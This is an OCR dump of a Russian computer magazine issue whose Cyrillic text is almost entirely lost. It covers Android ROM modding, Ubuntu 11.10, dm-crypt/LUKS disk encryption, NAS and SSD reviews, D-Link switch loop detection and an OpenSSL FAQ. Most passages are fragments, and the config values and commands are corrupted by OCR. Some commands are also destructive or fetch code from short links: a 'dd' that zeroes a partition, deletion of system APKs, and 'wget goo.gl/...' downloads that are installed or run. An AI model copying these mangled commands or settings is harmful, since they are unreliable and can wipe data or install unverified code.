, << >> . ,

NND- .

, Andoid l ADWLaunche
CyanogenModl . ,
LauncherPro lwww.launcherpro.com l:

Andoid ,
,

rm system/app/Launc her.apk
wget goo.gl/U9c54 - system/app/LauncherPro.apk

. ,

SETPROP

, n n -

. , Andoid
n. .

build . pop n
n setpop:

n n n

# setprop debug.sf.nobootanimation 1

n n n n

!n, i ,

. , n
Diale

One

Phone.apk

sms.apk.

Linu-n, n

cepepa

mc?

Google,

ssh-

n.

Andoid n

Go SMS

ARM

n n

NDK

. n, n

mc

n.

xda-developes n n n

Midnight

Commande. n k-n

lgoo.gi/Pax1 Hl n n

layout XML l
AXML, apktool n XMLI.

n,
, , .
xda-developes, n
Andoid.
<<famewok-es

mod

_>>.


famewok-es.apk ,

unzip:

$ cd /tmp; unzip -/Nativnuxinstaller_l.l.apk

, famewok-es

diff:

n n assets/kits/mc-4.7.5.4am.ta.jet . ta. gz, n

n k-n

la , n
apk, n n n lnstalll.
n n n n

$ diff -R -/framework-res \
-/rom/system/framework/framework-res
,

famewok-es,

mc:

$ cd -/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet

4PDA: goo.gl/t iH Ro.

famewok-es.apk

mc.

zi- n

aapt

apktool.

Andoid

SDK,

apktool

k-.
:

ClockwokMod Recovey. ,

$ cd -/bin; wget goo.gl/tC7k8

-/oml n uzip.

Andoid .

$ cd -/rom/system/framework
$ java -jar -/apktool.jar framework-res

n Andoid, , .

Andoid famewok/

framwork-res/dist/framework-res.apk
$ rm -rf framework-res

11

famewok-es . apk .
- .

apktool:

ng-,

cd -; wget goo.gl/hxzSl
tar -xjf apktool1 . 4.1.tar.bz2
cd -/rom/system/framework
java -jar -/apktool.jar d framework-res.apk

system/

media/bootanimation .zip. :

$ cd /tmp
$ mkdir bootanimation; cd bootanimation


famewok-es, .

- s/dw-* es/layout-*
ng-
. , dawae

land-mdpi-

l n n n
!. ,


, &

&

ANDROID

# system.prop
#

f geeric

sdk

1d.1 ibpoth; / system/ 1i/1 ibi 1switch.so


lswi tch. vendol ibp~th; / system / 1 i l ibi 1-nto-umts-1. so
lswi tch . g~nl i bp~th= /system/ l i 1ibg~n i l. so
1d. i ibogs; - d /dev/t tySB

sf. icd_dens i ty;2~B

# Default net1a10rk type.


# ~ ;} COtfl 1 EVOO.
.

te lephony. defaul t _ network=

wifi . interface

= tiwlanB

seconds. it high to minimize battery dain.


case in ~ich there mmd access points,
tl but n in ange.
wifi .supplicent_scan_interva l = 15

#
#

ime bet~.~Jeen scans in


his only affects the

# The OpenGL ES ! 1eve1 that is native1y


# his is 16.16 fixed point nut
= 131872

suppoted

this device.

.o .o pengles .vesion

build.prop Motorola Defy

FPS 241:

$ mplayer -nosound -vo png:z=9 video.avi


. xda-developes
,

n . n
.


, ,-
.

Android

system/build . pop,
n .
,

Andoid, .
.

ClockworkMod Recovery:

Android

1.

ro.HOME_APP_ADJ=l

$ unzip -/rom/system/media/bootanimation.zip

desc.txt,

n n:

n
n n

n .

FPS

n.

2.

JG-:

ro.media.enc.jpeg.quality=lee
4Se see
1 parte
partl

,
n .

480

800,

3.

IFPSI 30 / .

n
:

n n ,

t. n ! 1 n
pl. lpatll n
, n n . t

debug.sf.nobootanimation;l
4.

GPU:

, n ,

t- , n

debug.sf.hw=l

. ,
n,

0001 .png, 0002.png

. .

n ,

n .

5. !n n
n n USBI:

. n

ng- n mencode l

desc.txt

persist.adb.notify=e

> cd /rom/system/framework/
> java - jar /apktool. jar d framework-res . apk

wifi.supplicant_scan_interval=180
pm.sleep_mode=l

1 Loading resource t ,, .
1 Loaded .
1 Decoding fi le-resources ...
1 Decoding values*l* XMLs , ..
1 Done .
1 Copying assets and libs ...
> 1s fra111ework-res
Andro idMan i fest. xml apktoo 1 . yml assets
> ls framework-res/res /
values-es
anim
va 1ues-es-rES
color
values-fa
drawae
drawae-en-ldpi
values-fa-r!R
drawae-en-mdpi
values-fi
values-fi-rFI
drawae- land-ldpi
drawae-land-mdpi
values-fr
values-fr-rBE
drawae-ldpi
va lues-fr-rCA
drawae-mdpi
drawa e-nodp i
va lues-fr-rCH
layout
values-fr-rFR
va l ues-he-r 1L
layout-land
values-hi-r i N
layout-port
values-hr
raw

ro.ril.disae.power.collapse=e

3.
res
va lues-mcc23B-ko
va lues-mcc23B-n l
va l ues-mcc23B-p l
va lues-mcc23B-pt
va lues-mcc23B-pt-rPT
va 1ues-mcc23B-ru
va lues-mcc23B-sv
va lues-mcc23B-tr
va 1ues-mcc23B-zh-rCN
va lues-mcc23B-zh-rT'"
va l ues-mcc232
va l ues-mcc232-cs
va l ues-mcc232-da
va l ues-mcc232-de

1 j1m
3 j1m
dw--
dw-- 13 j1m
> 1s -1 system
u 48
dw--
2 j1m
dw--
2 j1m
1 j1m
dw-- 13 j1m
dw--
2 j1m
dw--
2 j1m
dw--
7 j1m
dw--
3 j1m
dw--
3 j1m
dw--
7 j1m
dw--
3 j1m
dw--
2 j1m
-w-----

ro.ril.enae.dtm=l

ro.ril.hsdpa.category=10
ro.ril.enale.aS=l
ro.ril.enale.g.prefix=l

ro.ril.htcmaskwl.bitmask=4294967295
ro.ril.htcmaskwl=l4449
ro.ril.hsupa.category=S
4.

1904

-w-----

ro. ril. hsxpa=2


ro.ril.gprsclass=10
ro.ril.hep=l

net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize .wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960

framework-res.apk

> 1s -1
u

G-:

uses
uses
uses

1941504
4095
4095

.
HOSi .
.

29 2008 boot, img


8 15:33 META-INF
8 15:33 system

system/

build.pop .

ll*'lk

, , -

uses
uses

uses
uses
uses
uses
uses
uses
uses

uses
uses

uses

>1

4095
4096
3598
4095
4095
4095
4095
4095
4095
4095
4095
4095

HOSi.
HOSi.

.
HOSi.
HOSi.
HOSi,

HOSi.

8
8
29
8
8
10
8

HOSi.

HOSI.

8
8
8
8

HOSi.
HOSi.

HOSi .

15:33
15:33
2008
15 :33
15:33
17:15
15:33
15:33
15 :33
15:33
15:33
15 :33

bin

bui1d.pop

etc
fonts
famewok

1ib
media
tts
us

vendo

xbin

testsign .

zip:

$ cd -/rom; zip -r my-rom.zip

, Recovey
:

$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip

m y -om-siged.zip
.

6.

R e covey,

!.

ro.lge.proximity.delay=25
mot.proximity.delay=25

data / facto y e se t>>,

Wipe

l Reco v ey <Ente>J,

7.

<< Choose zip


ro.mot.buttonlight.timeout=0
,

Yes

<Ente> .

<< lnstall zip

fom sdcad ,

fom sdcad , my-om-sign.zip 50-

Yes.
system now .

<<Reboot

l:l!:lel!tj
Adoid- ,

1.

debug.performance.tuning=l
video.accelerate.hw=l
windowsmgr.max_events_per_sec=150

, ,
,

2.

1/etc/init.dl,

. :::

11

Ubuntu 11.10

UBUNTU 11.10
Oneiic Ocelot [ )- 15- Linu- Canonical.

V- [

Unity.

-,

1,5 ),

[lnkscape, GIMP, Pitivi LibeOffice). 150-


CD/DVD, USB Flash.

>>.

!
>> ).

Linux kenel3.0.1;

Launche.

Unity 4.12.0 n
Compiz 0.9.6;
GNOME3.2;
no n
Mozilla Fiefox 7.0.1, Mozil la
Thudebld 7.0.1, LightDM,
Oeja Oup,

- Gwibbe;
LibeOffice

EJ

Uity
, >>

. ,
,

: ,

, ,

Ubutu Softwae Cente

5.0

, ,

Cente

OneConf,

IFile > Sync between computes ...).

n
U

<Ai t+Tab>.

-
, .

Qt Unity 20,

OpeGL. Uity

>>. ,

01/156/2012

<<

l ud -

, ,

!
Ubuntu, . .) Softwae

Banshee

Google Oocs)

Rhyth mbox

, ,

, .

Lenses,

LoCo

Ubuntu IOash Home)


Places,

Ubutu

1,;,1 lgoo . g l /cC5k, ubuntu-defaults-builde),


Lauche.

ARM.

R- .

1111

3.4.2;
Python 3.2, GCC4.6.1, Bash4.2, CUPS 1.5.0,
Pidgin 2.10.0, UOEV 173, .g 1.10.4;

Unity 30,

Qt

20

Qt Quick.

Unity 20

Canonical
n

20 13 .
Ubuntu 12.04,
2012 , LS-,


n .

117

SYN/ACK

aka 13oz

qscentr.ru -
n GSPD
n


.
,





- .
- ,

[ ),
. ,

, .
.

118

01/156/2012

rn

, - ),

. -,

[ -I . <<

9) , ,

, ,

. ,
:

NQ687

781.

1) ,

. ,

, - ,

- .
? ,

11

, ,

, ,

21

111 , ,

[ - l .

, ,

, :

<<, , >>.

( )-

, 2 [ ) , ,

,
, ,

, , , etc.
12)

[ )

31

- ,

, . ,

, . ,

<< n

(I- ,

. :1

, ,

, ,

. -

. ,

,

58 .

, - ,

etcl, ,
[ ) .
[
) .
13)

- ,
.

41 - ,

, !

- ,

, ,

. ,
, .

, .

141 - ,

, .

51

- .


l - ,

, , ,

[ )

- ,

. ?

, , ,

, - ,


- , ,

:1

, .

16) -
. ,
,

, :

. ? , .

, [ /) ,

- . ,

[ u , ,
I, ~

), -

L; , ,

[ ) .

[ / l
'> [ ).

71

151

: /

61

- .

17) -

. ,

, , l

, ,

. ~

. ,

- , ,

. .

8) - .
: ,

, , !
,

. , , ,
, ,
, .

181
- ,
.

01/156/2012

119

SYN\ACK
19) - ,
?

, ,

. .

<<. ,

, [ , ,
1- . ) - ,

. , -

.. << - ?

, , ,

. .

- : ,

- .

[ ) .
- 90 .

:1

, ,
, -

, [

ISPDN. RU -

) .

20) - ,

. ,

, , ,

. , -

- << >>.

,
,
- -.

, [

, << >>
<< >>- ,

),

. ,
. , ,
, ,- - ,

. ::


?
n :


- , <<

11 - ,

8) -
,

>>,

, ,

, ,

, . .

etc).

9)

2)

-
152-, .

3)

, -

152- << >>.

, ,

4)

152-.

10)

, ,

, ,

- )

6)

11)

5)
- :

120

- ,

[ ) .

7)

,
-

, ,

,
.

, -

, <<

. ,

. . ,

,-

,- ,

01/156/2012

181

, - ,

,
- ?

, - ,


- 2;

. ,


-1.

- ,

. ,

181

( !,

2 -

. ,

,
.

181

.
,

r.1

1.;.1
.

. ,
.

r.1

- .

1.;.1 ,

- ?

, , , ,
. .

181

181

, -

VLAN'a

01/156/2012

121

SYN/ACK

grinder lgrinderliHux.in.ual

LUKS- ~
google.com/o/
J1.\illiiJ!

vGate R2 -

securjtycode.ru/
oroducts/sn ym-

ware/ygate com
MySQL 5.6
Reference Manual
- Encryptjon and

Comoressjon- clck.
!Lfru
Windows Azure SDK
- microsoft.com/
wjndowsazure/sdk

Novell
Cloud Security Service
novell.com/
prodcts/cloud
securjty-service

FreeOTFEfreeotfe .org

<<>>

n

""Jr\1

>>

<< . ,

IPaaS)
ISaaS) ,
.
,
.

, l
). , . <<
,
, , ,
- .
, ,
, .

, ,

v - i de x .com ,

38,9 %.

,- . ,

. ,

PR,

- ,

.
,

SaaS ISoftwae as Sevice- )


PaaS IPiatfom as Sevice - ) ,
, .

: - .
,
,

SaaS.

, ,

. ,

122

Google

Amazo,

<< ,

01 /156/2012

ctt o --<08

, << >>,
V-I NDEX 03 2011

VIRUALI ZATION
PENERATION R

CONSOLIDATION
RATIO

38.9%

5:1

11!::8

IICI:I

! >> !: -
, .

HYPERVISOR
INUSE

. , Compu teWold,
, ,
, VMwae
vSphee.

SaaS

- .
, ,

""'

GARTNER OTONVIRUALIZATION INDUSTRY


0.. ..... _

............. ~ ...

--wy ---....

Cif'q)o'9!f"~fii~<PI'I'

:-...::""

.. -lllt~

.. --~--

SaaS

.
, -

. -
. ,

v-index.com, n

! ! .
,

, -

- .

- ->> ,

<<>>. ;l

, VMwae,

R2l secuitycode . u/poducts/s vmwae/vgate com l.

. ,

- .
.

!
VMI. ,
, ! AC L ! .

vGate

- ,

IABI II

VM,

la !

. ,

, ,

-.

, . ,
.

DMZ

IVPN, /etc/host.allowl.
DDS-

.
.

l gnu.og/philosophy/who-does-that-seve-eally

seve.html l << >>

, n.

SaaS

SS-

. , . ,

.
,
, .

Secu ity Cod e Tu stAccess i secuitycode.u/


poducts/tustaccess l

f\lo,a)'I(I-....Gitl"-eAI:IW-~01..__-oADCrj'!\1,

~~~~-..,_
-1)'---e,l.l.

. ?

.. ,._, atip.~a,._.

n,p.,I.JIWVIVTtwtoel1oliRe~WC~-TI C~r--, ._,.,...o;o:f1)0,1.)'1(fY,

,
.n.S-;u~JI

, , ,

SaaS , ,

,
- VMwae

vC ioud

diton.II-~II~Aor;ryN~r<~

.Crpoom.un:r-oc<,'I'JIDf~&-.......:o;riiiiQflol'*"'

0~)'1('1

Die c to .

0(< 19:2909-0).2011)

- ,
.

. ,

01 /156/2012

v&ate

1Z3

SYN\ACK
- Novell Cloud Secuity Sevice INCSS, ovell .
com/poducts/c l oud-secuity-sevice l-
,

>> .

NCSS

>>

[ A!:tive Diectoyl. ,

SaaS/PaaS/IaaS, , NCSS

, -

, .

SaaS

Amazon 21,
NQ152

, .

<< >> [ clck . u / POdc l n

. ,

<<>>

. ,

SaaS

. ,

<<>>

. ,

, ,

, . -152

, ,

, ,

, << >>.

, ,

. ,

, ,

<< >>. ,

, .

[ !,

SaaS .
HTTPS,

. , <<

, -

<<>>,

PCI [Payment

d lnfastuctuel,
, : << >> - .

, ,

DM-CRYPT

, ,
,

PCI,

dm-cypt ,

2.6+

CyptoAPI.

, ,

, - . ,
- ? ,

ht.

<<

>> .

Windows

FeeOT F E,

Windows.

$ sudo apt-get instal l cryptset up


:

$ sudo dd if;/dev/zero of ;/dev/sda5 bs;4K

LUKS [The Linux Unified Setup, code.google . com/p/cyptsetup l,


Linux dm-cypt , n
. LUKS
TKS1 [Template
Setup 11, ,
n ,
.

/dev/mappe/ :

Windows

FeeO TFE [ feeotfe.og l,


Liux icyptoloop, dm-cypt l

$ sudo cryptsetu p - l uksFormat /dev/sda5


$ sudo cryptset up lu ksOpen / dev/s da5 encdisk

- HSM [ dw Secuity Module,


n ! PKCS#11.
, n

Windows -

, .

Bitlocke [ - EFS,

$ sud o mkfs. msdos / dev/mappe r /e ncdisk


$ sudo mount -t vfat - rw /dev/ mapper/encdisk /mnt/
encdisk

. ,

Encypted File Systeml.


,
. ,
, ,
:

. - n ,

$ sudo umount / mnt/encdisk


$ .sudo cryptset up luksClose /dev/ mapper/encdisk

, . n,

MySQL

Refeence

Manual

n. 11.13

Ecyption

01/156/2012

111rmll
ySQt..

5.6

~fetnc

Mlr'll.l.al :: 11

F\.11'\Ctns

ilnd OplililtM : 11.13 encryptn iOI"\d Compron f unc: toons

RYPTSEUP ( 8)

11.14lrlfonn.1tionfui"ICttOnJ

T.J811 . 1 7 . encryprionfun~rions

SctiorrNIIvlgatlorl

(T<>ttkJ

11 FunonrandOpertors
011/YIII UIIngAI:B

11. 1 Functn.dOpllfiltOc"

1 1 2 convers10n irr e~oreJ510

o.t!YIIIIlflg

t1 .4CO<"I'OIAowfi"ICOm

EI'IUYIJ(IJiriiiQ

RIulnlrtv~Oflhl pre- ~ . \itnpltmtnU~on01Pio.S$WORO

Clkul118 1ndlltUIIIIPIIswordS.-u.g

an .-.- 2 thecbum

:i1Z.

CaltW.Ie

Un<OI\'II)IfiiiSirl/>oComprtiSt

t~anged

deviceJRllpper 11111ppings.

For ba stc

p!ngs, there 11re four operations .


CIONS

These st rings are vatid for <attion> , fo\\owed

their cac tion 11rgs> :

-~
11 7Dateilfld"mefunctJOnJ

"""''"'

11.9fuiTetS..udlfurtenons

create s

ltlOCe;Ft.nttrOnsiOnc:IO(IeriltOI"J

I! . IIXL~

$et , -- skip ,

n enci)'PtiOn i!lnCI compresston tunctlons return stmg:s tor\lif\\cnthe resun mtgf\1: coota'I ~ IJy1eV31Ues
rr you want to store tnese re~. use coturnn Wlth Y!J!I.1A&X or 1! blny $111nQ data rype Thr, ll(dlvold

potential problems -.wn tralllng space removal or th.ractr set CD!"!,-,IOn th31 WOVId tharoge data vatues.

~n

as

11 . 13EI"IO'VI)t.IOnilndComores510

removes 11n existing


llA1

backed

device <device> .

pping

< n>.

<nome>
reports the st11tus for the

11 . 16Ft.lndJO/\'Jiidodd"rersfor

Use

118PP1IOJ <n>

wrth GROUP CliiUSes

< IIIIII! >

1-- hash , Cipher, -- ver1ty -p11ssphr11 se , -- key - flle, -- key -size, -- of

11 . 17SI).IA!Extensrons
11 18 Preosn Math

Functions,

ll.t5ielilf\o80USF~

d.ata type {gas, D.IW:I6 . .:;)

MySQL n 15

upping wi th

only l

'""""""

<options:.o can
-- relld -

!JtiiW!.I. <nllme>

11-14111fOtm.atnfunctJOnS

Compession

(inc\uding LUKS extension)

ESCRIPION

o l l J2kfurw:ti'OnJ

and

dii Cypt

cryptsetup 1s used to convenientty setup d11 -crypt


(ptain} da crypt IIIIP

11.8WhiltC.alendilrlsUsed8y

Clll.utalllll05tn.o:um

no~ "

cryptsetup setup c ryptographic volu111es for

11.61-Unent f~ill\d

Enltlirla

you use

Co~~r~ands

YNOPSIS
cryptsetup <options:o- <action:> <actio n illrgs:-

IJ .OI)er<rS

115StmQFt.c\ctJor\s

EI!CJVI)III~

m~ occtJ 11'

1'1111ntenance

CRYPTSETUP(8)

11 .13. Encryption and Compression Functions

15 .

f:'l

8 "n!rmlnal

Linux

dm-crypt

SQL- n

n,

, n .

, n ,

n .

> CREATE TABLE mdS_t (mdS_val CHAR(32), ... );


> INSERT INTO mdS_t (mdS_val, ... ) VALUES(MDS ('a bcdef'),
... );

n . n ,
,
Tend i SecueCioud, n
F eeOT FE .

<<

API

n .

Windows Azue SDK

n ,
, , n

l micosoft . com/windowsazue/sdk ), n

Windows Azue,
, n n CSP ICyptogaphic Sevice P ovide,

. n

n n ).

vCioud.

n,

, n
n

XSS

SQL injec tion

n . n

Amazon

2,

Eu calyptus

Secu eCioud << >>,

. ,

/ .

, n, n n -

, n

<<>>- , , .

n , n

, n n

, . n

, ,

n , ,

. , . - ! n

n ! , )

. ::::

Pli!aseenwlh!rurD!rofPIIICDF21:tylte"llcf&to~arriedaulcrr>yoru

~dtogenertea'ltnei1'PfDI
hene-lhei"'U'I'Oc!r,lhegr18"1heSLntyoffi!redu!lheslowa
_,~ng
c{~if,_.,tn;rlhe...._on.POA)

..

olle:JfisvQII~Ifflfl'litldeflolt,youwie~toen!l!rLI

v"-'e~tmeyoui!IOI.nt'fO-'~forthis/"USIOI"IitiSr~INt
-UierlluV'I!itltlt.dtflth~ ..ne:s~irii!*o.Jirnted\l:ldo
~.

Tend

FreeOTFE Linux

01/156/2012

Micro SecureCioud n n

< ))

125

FERRUM

.,

As

5- 6-

NAS-CEPBEPOB

NAS]

\7

.
.

,
, . , >>

. -

RAID.

RAID.


n , n n .
, n
? - n

100

NAS.

n ,

n .

NAS

, .


n n n .

lntel NAS fm Toolkit- n


NAS

. n

, n n n
n . n n

RAIDO.

RAID5

n .

n , n .
, - n

NAS.

n .

/J
126

01/156/2012

NAS

D-LINK SHARECENTER
PR01200

0-Link

~-t , n Ethenet

USB.

n
L-n . ,

n ,
n .

, ,
. ,
, ,
-n
.

0-Link

ShaeCente

1200

. n ,
n .
-

0-Link

. ,
n

iSCSI.

- .

NETGEAR READYNAS
6ULTRA
n

NETGEAR

.
n .

NETGEAR ReadyNAS
6 Ulta
2 . , n

12 ,

. n

RAI05.

>> Fon tView. ,


n .
n n
.
n , n
n .

NETGEAR ReadyNAS 6 Ulta,

, .

01 / 156/2012

127

FERRUM

NETGEAR READYNAS 6 ULTRA


ETGE AR Ready NAS 6 Ulta Plus
NETGEAR Rea dyNAS 6 U lt a.
.
- lt el

1,8

Atom,

lntel Pentium

2160,

. ,
n . ,
.
. n
F ontView

4.2.16

-,

RAID5

Boot Menu.

-,

. ,

NETGE AR ReadyNAS 6 Ult a .

,
<<>>. ,
,
.

QNAP TS-559 PRO+

QNAP TS-559

+,

QNAP

QNA P

, <<
.

QNAP TS-559

,
, .
VG- . ? ,
,
.

TS-559

VGA

QNAP

+ .

,
.

RAID5

<<

,
n .

D-Lik S h areCe

ter Pro 1200

128

2 Ethernet 110/100/1000 /l, 2


USB 2.0
JBOD, RAID , RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, FTP, UPnP, , NFS, !SCSI

NETGEAR ReadyN AS
6 Ultra

NETGEAR
ReadyNAS6
Ultra Plus

lntel Atom Dual , 1,66


DDR2 DIMM 1 1
2 Ethernet 110/100/1000 / l , USB 2.0

lntel Pentium 2160 , 1,8


DDR2 DIMM 1 1
2 Ethernet 110/100/1000 /l, USB 2.0

X- RAID2, RAID , RAID 1, RAID 5, RAID 6

X-RAID2, RAID , RAID 1, RAID 5, RAID 6

CIFS/SMB, F, UPnP, , AFP, NFS, DLNA,


Bonjour

CIFS/SMB, F, UPnP, , AFP, NFS, DLNA,


Bonjour

01 /156/2012

NAS

SYNOLOGY DISKSTATION 051511+


ynology Oisk5tation 051511+ n
QNAP 5-559 +. n
5ynology n ,
. -,
. ,
. - ,
,

,
, .

. ,

y QNAP

5-559 +,

5ynology

Ois k5tatio

0515 11+

jl!-

, ,
, . ,
.
, -

. -

45

THECUS N5200XXX:

The cus N5200XXX.


.
,

NETGEAR:

, , , .
>> : l tel

Atom 0525

. ,
.
.
, .

L-, /

LAN- U5-.
Thecus N5200XXX

, .

, << ,
>>, , ,
.

Synology DiskStation DS1511+

THECUS

N5200XXX

, ,-
.
,

lntel Atom 0525, 1,8


OOR2 1 1
2 Ethernet 110/100/1000 /l, 5
USB 2.0, 2 eSATA, VGA
JBOO, RAID , RAID 1, RAIO 5, RAID 5+,
RAID 6, RAID 6+, RAIO 10, RAIO 10+
CIFS/SMB, F, F, UPnP, ,
S, AFP, NFS, OLNA, Bonjou,
iSCSI, telnet, SSH, SNMP

Oual , 1,8
OOR2, 1 1
2 Ethernet 110/100/1000 /l, 4
USB 2.0, 2 eSATA
JBOO, RAIO , RAIO 1, RAIO 5, RAIO 6,
RAID 10
CIFS/SMB, F, TFPT, UPnP, OLNA.
, AFP, NFS, Bonjour, ISCSI

lntel Atom 0525, 1,8


R SOOIMM 1 1
2 Ethernet 110/100/1000
/l, 5 USB 2.0, eSATA
JBOO, RAIO , RAIO 1, RAIO 5,
RAIO 6, RAIO 10
CIFS/SMB, F, TFPT, UPnP,
, AFP, NFS, Bonjour, ISCSI

NA5,

5-

6-. , ,

5ynology

Thecus.

QNAP,

<< .
<<

NETGEAR.

NA5

[ !,
. ::

01/156/2012

129

FERRUM

SP060GBSSDVOS25

SILICON POWER

: 550, 2, 5
: 5 3.0
: MLC

.
I Ome t e,

. : 550 /
. : 500 /

SSD /

: 60
n TRIM :

, .

IO mete'a,

,
:

. . k

HDD,

Vantag e,

. ,

Disk

B enchma k

550, ,
,

0,5 8192

n.


- 550

.
Si1icon Power
5P060GB55DV30525. -
60 , Windows 7
n

, San dF oce

SF-20 00
MLC .
3-5 ,

.
Silico w

SP0 60 GB SSDV3 0525 ,

SATA 3.0,

IOmeter:
Radom read 4 : 21,44 /
Radom write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51 ,35 /
PCMark Vatage:
Test Suite: 26076
Windows Defeder : 42,95 /
Gamig: 176.73 /
lmporting pictures to Windows
Photo Gallery: 271,45 /
Windows Vista startup: 30, 18 /
Video editig using Windows Movie
Maker: 88,42 /
Windows Media Ceter:
340.73 /
Add i g music to Windows Media
Player: 151,54 /
Application loading : 167,14 /

130

. ,

est Results

0.5
1.0
2.0
4.0
8.0
16.0
32.0
64.0
128.0
256.0
512.0
1024.0
2048.0
4096.0
8192.0

-..

Write -

Read -

100 200

Write

Read

1961 3
35239
50435
16411 7
237596
316007
446227
463553
486711
488856
493674
492542
493674
489176
493674

17280
32256
54001
128548
179971
347832
396128
426883
464703
529998
546588
554109
559240
559240
556663

700 800 900 1000

300 400 500 600


Transler Rate 1 Sec

, ,

IOmete,
.
Sili co w

SP06 0GBSS DV30525

:
3 , 5 -

SSD,

480

,
,

.
w

SP060GBSSDV30525,

Si licon

. :::::

01 / 156/ 2012

3 000

000 *

MAN TV

PHREAKING

aka Lundes lsergey.lunderagmail.coml

Rx

Receive

Transmit


(n n! .
Loop-arn. ,

, ,
, .

, . ,

, .

- : ! :


- . ,

,

: l"- : << l>> .


<< ! ! - << ? - << !- <<
l ? - <<, !

- .

,
,
. -

,
. ,

, .

[boadcast stoml.

, ,

. , ,

- [. 11. <<-

... - .

loop_detection,

[! .
, - .
,

132


,
.

01 /156/2012

Loop

1. RJ45

: [
[ Ethenet [

Telnet

w-l.

.
Ethenet, I-.

1.

W-


, , . . , w

80

- I-.

DLINK DES-3200
-,

.

1.

I-
:
DES-2ee# cofig

ipaddress

ipif System \

.../....

. . . -I-, ....- .

2.

, I- ,
:

DES-32ee# show ipif


3.

w-

IP-

D-Link
RS-232,

,
,

Out-of-Band.

,
.

[, mil

Windows[. :
Baud rate: 9,
Data width: 8 bits
Parity:
Stop bits: 1
Flow Cotrol:

Lk-

t .
,

DES-3200#.

, ,

, , .

. , tl+,

<<? ,

.
,

01/1 56/ 2012

config,

133

PHREAKING

~
1... 8

----<

-----<0

RJ-45

DES-3288#config +

delete account
<usename>.

,,?" t.

w- Telnet,

I- ,
. I-


CLI:


.
-
.

DES-3288# config ipif System dhcp,


DES-3288# config ipif System ipaddress \
.../....

: Admin Use.
Admi .

... -I-, .... - ,

System- .
.

CLI:

. 0-Link

DES-3288# create accou nt admi n/user <username >

(!. n

n)

,

: << t case-sesitive w passwod>>.

0-Link

15

cofig pots. ,

, 10 /,

Success.

1-3

Admin :

Username "dlink":
DES-3288#create account admin dlink
Command: create account admin dlink
Enter case-sensitive new password: ****
Enter the new password again for confirmation:****
Success.
DES-3288#

DES-3288#config ports 1-3 speed 18_full learning


enale state enale
Command: config ports 1-3 speed 18_full learning
enale state enale
Success
show pots < n>
.

: OES-3200# config

account

NVRAM.

save:

<usename>

DES-3288#save

dlik:

DES-3288#config account dlink


Command : config accoun t dlink
Enter old password:** **
Enter case-sensitive new password: ****
Enter the new password again for confirmation:****
Success.

: OES-3200# show account.

134

,

,

01 / 156/2 012

Loop

Command: save
Saving all settings to NV-RAMoo
doneo
DES-32ee#

1%

LOOPBACK

r .
t:

IJ

- n n ,
n n
n. ,

lk-.

DES-32ee#reboot
Command: reboot

. <<lk->>.
, , ,

, n .

eset.

DES-3200#eset config
-, n
eset, .

Cshell,

Hello word

# !/in/csh

loop_detection Alcatel
interface range ethernet (1-24)
loopback-detection enale
exit
loopback-detection enale
loop_detection Dlink
loopdetect
config loopdetect recover_timer 1
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap n
config loopdetect ports 1-24 state enaed
config loopdetect ports 25-26 state disaed

loopback .
.
, , -

, U-, , ,

# vero 1
# , ~ n
i f ( ' ps 1 grep ' redbut' 1 grep -v 'grep' 1 wc -1' <= 1 )
then
# , snmp
set snmpdir = " / usr/ local / bin / "
set community = "puic "
# snmp
set snmpcmd = "-t1 -r1 -Oqv - $community -v1 -Cf
set mib_stat = "IF-MIB: :ifOper Statuso$2"
set uid = "$1"
set fl = ' '
#
while ( "Sfl" == )
set nowstatus = ' $snmpdir/ snmpget $snmpcmd $uid
$mib_stat 1 sed 's / up/ 1/ ;s / down} e/ ;/Wrong/d ' '
i f ( " $nowstatus " == 1 ) then
echo 'Hello Wo r ld'
# e-mai l
echo " ! Hello World!" 1
sendmail -f[__] [_]

<< n . - .

[Rx Txl .

endif
sleep
end
endif
exit

2 6, 1 3.

, , -
-. .

n n n :

3.

, << >>

o/scriptocsh

I_

link . Ypal
,

n << !

. , , ,

,J HELLO WORLD
Hello wold?

! n
n , n

- !

~ v.. n

n n ,

n , ,

: ?

n [ .

41.

n :

? ,
,

. << >>,
.

- -. n

n , >>,

, - .

, n . n
. ?
. . ? !
n

01/156/2012

Hello Wold Cshell:

loop_detection , <<>>.

, n .
! :::

135

UNITS/FAQ UNITED

[lwliller.com/slepahl

FAQ United

r.t

FAQriREAL.XAKEP.RU

OpenSSL

$ echo 'GET /1.0' 1 openssl s_client


-connect example.com:443
[ ... ]
New, TLSvl/SSLv, Cipher is

n .

....
LINUXCEPBEPE?

lr,8

$ openssl aes-256-cbc -d -in \


file-test .aes -out file-test-dec

Server

SSLv.

SSL- . n

DHE-RSA-AES256-SA

OpenSSLI -,
n

puic

key is 2048

bit

Linux-ccee,

OpeenSSL

TLSv1/

. ,

OpenSSL
speed test,

OpenSSL

4.

n n sh-. ,

, ,

n:

, ,

$ for f in * ; do [ -f $f ] && openssl


aes-256-cbc -salt -in $f -out $f.enc
-pass file:password.txt ; done

,
.

1.

GnuPG [www.
gnupg.org l, n
OpenSSL:

2.

$ openssl aes-256-cbc -salt -in


file-test -out file-test.aes
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc
encryption password:

5- .

[F., . . l

OpenSSL n
SHA 1-1 SHA1

$ openssl shal file-test-64


SHAl(eapol-64)= afc594f26ca08780737
69d24f8c04fe35f2bf8b3

filetest AES-256 [ CBCI


file-test.aes.

, SSL!TLS
n

nn NS- ,

I-

OpenSSL.

DNS-OTBETOB

&-.

3.

file-test -64:

r.t

....

5 :

$ openssl s_time -connect \


webserver.com:443

debug.exe.
64
. , debug .exe
Microsoft .
, Windows 7 Server 2008
PowerShell,

BIND [www.isc.org l.
NS-

DNS-c epep,

BIND,

ApateDNS [ it . ly/sZQiK1 1.

suit-n

Mandiant.

n NS - n

, .

I-, .

, ,

, ,

, n

ApateDNS [ n i,

NS-.

hosts?

136

DNS .

01 /156/ 2012

FAQ UNITED


. ?

.
<<

>>
PoweShell:
